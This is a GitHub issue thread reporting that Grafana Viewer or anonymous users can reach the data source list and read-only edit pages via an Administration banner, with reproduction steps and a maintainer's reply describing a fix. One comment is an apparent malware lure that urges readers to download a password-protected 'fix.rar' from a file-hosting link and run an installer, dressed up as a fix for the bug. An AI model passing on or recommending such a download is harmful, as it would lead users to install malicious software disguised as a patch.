### ISSUE TITLE
Anonymous/Viewer can access datasources page

### ISSUE THREAD

**Issue by EvannG1** [grafana/grafana#92421]
### What happened?

When Grafana has “anonymous” access configured with a “Viewer” role, anonymous users have access to the datasource list and the datasource edit page (but cannot save).

### What did you expect to happen?

A redirection or error message.

### Did this work before?

I switched from 10.3.1 to 11.1.4, but I don't think 10.3.1 had this problem (I could be wrong).

### How do we reproduce it?

1. Enable anonymous access.
2. You should see the “Administration” button in the sidebar, click on it.
3. The information message “Data sources have a new home! You can discover new data sources or manage existing ones on the Connections page, accessible from the main menu” should appear, along with a "Go to connections" button.
4. You now have access to a list of all datasources.
5. Bonus: the "Build a dashboard" button doesn't work and redirects to the default dashboard. But if you manually modify the link of this button to "/connections/datasources/edit/<datasource_uid>", the anonymous user will have access to the datasource modification page in readonly.

If we try to access these pages by specifying the URL directly, we'll be redirected correctly.

Shouldn't the “Administration” button be visible at all as a “Viewer” anyway?

### Is the bug inside a dashboard panel?

No.

### Environment (with versions)?

Grafana: 11.1.4
OS: Any
Browser: Any

### Grafana platform?

Docker

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by EvannG1** [comment]
It seems that this problem is more related to the “Viewer” role than to anonymous access.

**Comment by IevaVasiljeva** [comment]
Hi! I could repro this and have created [a PR](https://github.com/grafana/grafana/pull/92886) that will hide the banner for users who don't have access to create/edit data sources. This means that Viewer users won't be able to redirect to the data source list from the banner anymore.

In general, Viewers can list data sources (through the API), so this isn't a data leak. But we do hide the data source list page from them, as they can't interact with data sources and we don't want to clutter the UI for them.

You also raise a good point about `Administration` section being visible to Viewers. I agree that this is not great. For context, this is because the Correlation feature is located under this section and is meant to be visible to all users. However, I think we could move `Plugins and data` from the `Administration` section to a more suitable place; especially now that we're placing generally accessible features under it. I'll discuss this with the team.
